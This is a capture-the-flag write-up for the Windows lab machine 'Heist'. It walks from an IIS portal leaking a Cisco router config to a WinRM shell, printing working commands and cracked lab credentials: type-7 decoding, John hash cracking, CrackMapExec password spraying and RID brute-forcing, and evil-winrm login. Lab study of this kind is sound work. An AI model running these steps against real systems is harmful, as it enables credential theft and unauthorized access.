Heist
A guest-accessible IIS support portal leaks a partial Cisco router config; the reversible type-7 passwords decode instantly and the type-5 MD5crypt cracks with John, then credential reuse plus SMB RID-bruteforcing and password spraying yields a WinRM shell and the user flag.
Overview
Heist is an easy-difficulty Windows box that chains a classic information-disclosure-into-credential-reuse path. A guest-accessible “Issues” portal on IIS leaks a fragment of a Cisco IOS router configuration. The Cisco type-7 passwords are reversible obfuscation and decode immediately; the type-5 MD5crypt secret cracks offline with John. Those passwords are reused as Windows account passwords, so spraying with CrackMapExec, enumerating extra users via RID brute-force, and re-spraying lands a WinRM login as Chase. This post covers recon through the user flag.
Machine Matrix
Enumeration and credential-reuse: Cisco type-7 decode plus MD5crypt crack, then SMB password spray and RID-bruteforce to WinRM — realistic info-disclosure chain, no CVE.
Recon
| Port | Service | Notes |
|---|---|---|
| 80/tcp | Microsoft IIS 10.0 | “Issues” portal, guest login |
| 135/tcp | MSRPC | Windows RPC |
| 445/tcp | SMB | microsoft-ds |
| 5985/tcp | WinRM | remote management |
1
2
ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.X | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV 10.10.10.X
IIS on 80, RPC on 135, SMB on 445, and WinRM on 5985 — the WinRM port hints that valid credentials may grant a remote shell.
Enumeration
Browsing to the site shows a login page with a “Login as guest” option. Logging in as guest opens an Issues page. A ticket from user Hazard says he’s having trouble with a Cisco router and attaches part of the configuration:
1
2
3
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
That’s one secret 5 (MD5crypt) hash and two password 7 (Cisco type-7) hashes. Type-7 is a reversible cipher with a published key table — it is obfuscation, not encryption. Type-5 is salted MD5, crackable offline.
Foothold
1 — Decode the Cisco type-7 passwords. Type-7 reverses instantly with a small XOR decoder (or any online Cisco type-7 tool):
1
2
python3 -c 'import sys;e="dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87";h=sys.argv[1];s=int(h[:2]);print("".join(chr(int(h[i:i+2],16)^ord(e[(s+(i-2)//2)%len(e)])) for i in range(2,len(h),2)))' 02375012182C1A1D751618034F36415408
# -> Q4)sJu\Y8qz*A3?d
The two type-7 values decode to $uperP@ssword and Q4)sJu\Y8qz*A3?d.
2 — Crack the type-5 MD5crypt hash with John. The $1$ prefix is MD5crypt, and rockyou contains the password:
1
2
3
echo '$1$pdQG$o8nrSzsGXeaduXrjlvKc91' > hashes
john --format=md5crypt -w=/usr/share/wordlists/rockyou.txt hashes
# -> stealth1agent
3 — Spray the recovered passwords over SMB. The Issues portal exposed usernames Hazard and Administrator. Spray the three passwords and one sticks:
1
2
3
4
printf '%s\n' 'stealth1agent' '$uperP@ssword' 'Q4)sJu\Y8qz*A3?d' > passwords.txt
printf '%s\n' 'hazard' 'administrator' > users.txt
crackmapexec smb 10.10.10.X -u users.txt -p passwords.txt --continue-on-success
# -> [+] SUPPORTDESK\hazard:stealth1agent
4 — RID-bruteforce for more users. Hazard can’t WinRM, but a valid credential lets us cycle RIDs off the host SID to enumerate accounts:
1
2
crackmapexec smb 10.10.10.X -u hazard -p stealth1agent --rid-brute
# -> 1009: support, 1012: Chase, 1013: Jason
5 — Re-spray against the new users. Test the same passwords against the discovered usernames:
1
2
3
printf '%s\n' 'hazard' 'support' 'Chase' 'Jason' > new_users.txt
crackmapexec smb 10.10.10.X -u new_users.txt -p passwords.txt --continue-on-success
# -> [+] SUPPORTDESK\Chase:Q4)sJu\Y8qz*A3?d
Chase reuses the decoded type-7 password — and Chase is in the Remote Management Users group.
User flag
Chase’s credentials work over WinRM:
1
2
3
evil-winrm -i 10.10.10.X -u Chase -p 'Q4)sJu\Y8qz*A3?d'
*Evil-WinRM* PS C:\Users\Chase\Documents> type ..\Desktop\user.txt
# [redacted]
A WinRM shell as supportdesk\chase and the user flag are ours.
Privilege escalation (dumping the Firefox process memory to recover the Administrator password) is left as an exercise — this post stops at user.